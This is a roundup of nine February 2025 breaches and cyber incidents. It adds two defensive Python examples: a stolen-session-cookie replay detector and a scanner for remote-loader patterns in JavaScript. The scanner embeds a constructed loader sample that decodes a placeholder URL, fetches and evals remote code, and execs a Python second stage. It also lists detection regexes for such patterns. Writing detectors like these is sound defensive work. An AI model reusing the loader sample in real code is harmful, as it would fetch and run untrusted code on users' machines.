Data breaches and cyberattacks continue to disrupt businesses worldwide.
From ransomware and distributed denial-of-service (DDoS) attacks to accidental and third-party data exposures, organizations face persistent and increasingly complex cybersecurity threats.
Below are nine notable data breaches and cyber incidents from February 2025.
Summary:
WhatsApp spyware breach affirmed by Meta
Meta, the parent company of Facebook and WhatsApp, confirmed that a spyware campaign had targeted users of the end-to-end encrypted messaging app WhatsApp. First reported by The Guardian, the campaign singled out specific WhatsApp users, including journalists and members of civil society.
Meta’s representative stated, “Instances like this emphasize the necessity of holding spyware firms liable for their illegal activities. WhatsApp commits to safeguarding users’ privacy.”
Theft of DOD and defense contractors’ access credentials
Access credentials tied to U.S. Department of Defense (DOD) agencies and defense contractors were put up for sale after being harvested by credential-stealing malware. Some of the stolen material included live session cookies, which let an attacker reuse an already-authenticated browser session and so sidestep multi-factor authentication (MFA) entirely, since the MFA check happens at login and a replayed cookie skips the login.
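A stolen session cookie is indistinguishable from the legitimate one, so the only place to catch its replay is in how the session is used afterwards. The following detector is an added example written for this article, not code from any of the parties mentioned: it binds each session ID to the user agent and source network seen on its first request and flags later requests that arrive with a different fingerprint. The log format, session IDs and addresses are constructed for the demo.

```python
"""Flag replay of a stolen session cookie from server access logs.

Added example (not from the original article). Each session is bound to the
client fingerprint (user agent + source network) observed on its first request;
a later request under the same session ID with a different fingerprint is
reported. Both the log format and the session IDs below are constructed.
"""
import ipaddress
import re
from datetime import datetime

# Constructed sample access log: timestamp, session id, source IP, user agent.
# Session a1f3 is used normally twice, then replayed from another network
# with a different browser 88 seconds later; session b7c9 is clean.
SAMPLE_LOG = """\
2025-02-10T08:00:01Z sid=a1f3 ip=203.0.113.10 ua=Mozilla/5.0 (Windows NT 10.0) Chrome/121
2025-02-10T08:05:12Z sid=a1f3 ip=203.0.113.10 ua=Mozilla/5.0 (Windows NT 10.0) Chrome/121
2025-02-10T08:06:40Z sid=a1f3 ip=198.51.100.77 ua=Mozilla/5.0 (X11; Linux x86_64) Firefox/122
2025-02-10T09:00:00Z sid=b7c9 ip=192.0.2.5 ua=Mozilla/5.0 (Macintosh) Safari/17
2025-02-10T09:30:00Z sid=b7c9 ip=192.0.2.5 ua=Mozilla/5.0 (Macintosh) Safari/17
"""

LINE_RE = re.compile(r"^(?P<ts>\S+) sid=(?P<sid>\S+) ip=(?P<ip>\S+) ua=(?P<ua>.*)$")


def parse_log(text):
    """Parse the constructed log format; malformed lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        events.append({
            "ts": datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ"),
            "sid": m["sid"],
            "ip": ipaddress.ip_address(m["ip"]),
            "ua": m["ua"],
        })
    return events


def network_of(ip):
    """Coarsen the address to its network so DHCP churn inside one site is not an alert."""
    prefix = 24 if ip.version == 4 else 64
    return ipaddress.ip_network(f"{ip}/{prefix}", strict=False)


def detect_session_anomalies(log_text):
    """Return one alert per request whose fingerprint differs from the session's first use."""
    bound = {}   # sid -> fingerprint captured on the session's first request
    alerts = []
    for ev in sorted(parse_log(log_text), key=lambda e: e["ts"]):
        fp = {"ua": ev["ua"], "net": network_of(ev["ip"])}
        first = bound.setdefault(ev["sid"], fp)   # first sighting binds the session
        reasons = []
        if fp["ua"] != first["ua"]:
            reasons.append("ua_mismatch")
        if fp["net"] != first["net"]:
            reasons.append("network_mismatch")
        if reasons:
            alerts.append({
                "sid": ev["sid"],
                "ts": ev["ts"].isoformat(),
                "ip": str(ev["ip"]),
                "reasons": reasons,
                # A network change alone is common on mobile links; both changing
                # at once is the stolen-cookie signature worth forcing re-auth on.
                "severity": "high" if len(reasons) == 2 else "low",
            })
    return alerts


if __name__ == "__main__":
    for alert in detect_session_anomalies(SAMPLE_LOG):
        print(alert)
```

On a high-severity hit the right server-side response is to invalidate the session and require a fresh login with MFA, not just to log the event; a replayed cookie that keeps working after detection is still a bypass.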
Massive IoT data breach exposes 2.7 billion records
A large-scale exposure of Internet of Things (IoT) data left 2.7 billion records accessible, including sensitive details such as passwords, IP addresses, and device IDs. Security researcher Jeremiah Fowler discovered the data in an unsecured, publicly reachable database belonging to the Chinese IoT firm Mars Hydro; no exploit was needed, as the database required no authentication.
Ransomware attack hits HCRG Care Group
HCRG Care Group, a provider of private health and social care services, was hit by a ransomware attack attributed to the Medusa cybercrime group. On its dark-web leak site, Medusa claimed to have exfiltrated 2.275 TB of data from HCRG and threatened to sell it or publish it online.
Jeff Wichman, the director of incident response at Semperis, remarked, “The ransomware attack on HCRG Care Group serves as a stark reminder of healthcare institutions continuously being targeted due to the accessibility of private patient records.”
Exploitation of Trimble Cityworks vulnerability
The U.S. Cybersecurity and Infrastructure Security Agency (CISA) warned of active exploitation of Trimble Cityworks, an asset management platform widely used by local governments and infrastructure operators. The vulnerability (CVE-2025-0994) carries a CVSS severity score of 8.6 and was patched in late January; federal civilian agencies were required to apply the fix by the end of February.
Global data breach at DISA impacts over 3 million individuals
DISA Global Solutions, a provider of employee screening and background check services, suffered a breach affecting more than 3.3 million people. DISA, which serves over 55,000 organizations, including a third of the Fortune 500, confirmed the breach in a filing with the Maine attorney general's office.
Cory Michal, the chief security officer (CSO) at AppOmni, noted, “Background check agencies remain prime targets for cybercriminals due to their storage of vast quantities of highly sensitive data, making them susceptible to attacks owing to their weaker security protocols.”
Palo Alto discloses exploitation of firewall vulnerabilities
Palo Alto Networks acknowledged active exploitation of a recently patched firewall flaw (CVE-2025-0108). The PAN-OS vulnerability is an authentication bypass in the management web interface that lets an unauthenticated attacker with network access to that interface invoke certain PHP scripts. Palo Alto Networks noted that CVE-2025-0108 can be chained with other vulnerabilities, such as CVE-2024-9474, to gain unauthorized access to firewalls whose management interface is exposed. Patching is the fix; the standing mitigation is to restrict management-interface access to trusted internal addresses so the interface is never reachable from the internet in the first place.
Kevin Robertson, the chief technology officer (CTO) at Acumen Cyber, advised, “Urgent application of patches for these vulnerabilities is crucial to prevent potential escalation of privileges and unauthorized access to Palo Alto firewalls, enabling manipulation of configurations and lateral network movement by threat actors.”
GrubHub reveals third-party data breach
The food delivery company GrubHub disclosed a breach in which an unauthorized party accessed personal information of an undisclosed number of diners, merchants, and drivers. GrubHub stated, “Our investigation revealed the breach originating from an account linked to a third-party service provider rendering support to Grubhub.”
The unauthorized party accessed contact details of campus diners, as well as of diners, merchants, and drivers who had contacted GrubHub's customer care. The accessed data included:
- Names, email addresses, and phone numbers.
- Partial payment card information for a subset of campus diners.
The intruder also accessed hashed passwords from certain legacy systems. GrubHub rotated the passwords it judged to be at risk.
Lazarus Group leverages LinkedIn for credential theft and malware deployment
Bitdefender Labs uncovered an ongoing campaign by the North Korea-linked Lazarus Group to steal credentials and distribute malware through fake LinkedIn job offers. The operation begins with a message offering a remote, part-time role and encourages the recipient to share personal information.
The attackers then send a package containing a “minimum viable product” (MVP) together with a questionnaire that requires running the demo. The code looks innocuous, but it embeds heavily obfuscated scripts that load malicious code at runtime from an external server. The payload is a cross-platform information stealer for Windows, macOS, and Linux that collects login details and files belonging to cryptocurrency wallet browser extensions, then sends them to an attacker-controlled server. The malware then downloads and executes a Python script to carry out further malicious actions.
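The useful defensive lesson from the "run our demo" lure is that the loader's shape is recognizable before anything executes: remote fetch plus dynamic evaluation, base64 decoding of an opaque blob, and a hand-off to a Python interpreter. The scanner below is an added example written for this article, not Bitdefender's detection logic or any real malware sample; it scores JavaScript files on those indicators so a flagged package can be refused until a human reviews it. The two files it scans, and the URL inside the encoded blob, are constructed.

```python
"""Score JavaScript files for remote-loader patterns before running a "demo".

Added example (not from the original article). Indicators are heuristic:
a legitimate build tool may decode base64 too, so hits are a reason to
review, not proof of malice. Both sample files below are constructed.
"""
import base64
import re

# Weighted indicators. A single one is weak; several together describe a loader.
INDICATORS = {
    "dynamic_eval":        (3, re.compile(r"\b(eval|new\s+Function)\s*\(")),
    "remote_fetch":        (2, re.compile(r"\b(fetch|axios\.(get|post)|https?\.(get|request))\s*\("
                                          r"|require\(['\"]https?['\"]\)")),
    "base64_decode":       (2, re.compile(r"Buffer\.from\([^)]*['\"]base64['\"]\)|\batob\s*\(")),
    "char_code_assembly":  (2, re.compile(r"String\.fromCharCode\s*\(")),
    "spawns_interpreter":  (3, re.compile(r"(child_process|exec|spawn)[^\n]*\bpython3?\b")),
    "long_opaque_literal": (1, re.compile(r"['\"][A-Za-z0-9+/=]{120,}['\"]")),
}
SUSPICIOUS_SCORE = 5

# Constructed samples. The "stager" URL is a reserved .invalid name, not a real host.
_PAYLOAD_B64 = base64.b64encode(b"https://example.invalid/stager.js " * 4).decode()
SUSPICIOUS_JS = (
    "const h = require('https');\n"
    'const blob = "' + _PAYLOAD_B64 + '";\n'
    "const url = Buffer.from(blob, 'base64').toString();\n"
    "h.get(url, r => { let d = ''; r.on('data', c => d += c); r.on('end', () => eval(d)); });\n"
    "require('child_process').exec('python3 /tmp/stage2.py');\n"
)
BENIGN_JS = (
    "const express = require('express');\n"
    "const app = express();\n"
    "app.get('/health', (req, res) => res.json({ ok: true }));\n"
    "app.listen(3000);\n"
)


def scan_source(name, text):
    """Return the indicators found in one file, with the line of the first hit, and a score."""
    hits, score = {}, 0
    for label, (weight, pattern) in INDICATORS.items():
        m = pattern.search(text)
        if m:
            hits[label] = text.count("\n", 0, m.start()) + 1
            score += weight
    return {"file": name, "hits": hits, "score": score,
            "suspicious": score >= SUSPICIOUS_SCORE}


def scan_package(files):
    """Scan a mapping of path -> source text; highest score first."""
    return sorted((scan_source(n, t) for n, t in files.items()),
                  key=lambda r: r["score"], reverse=True)


if __name__ == "__main__":
    for report in scan_package({"index.js": BENIGN_JS, "demo/loader.js": SUSPICIOUS_JS}):
        print(report)
```

Run this against the unpacked package before `npm install` or any demo command, since install scripts and the demo itself are exactly where the loader runs; a clean verdict still means executing unknown code only inside a disposable VM with no wallet or credential stores mounted.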
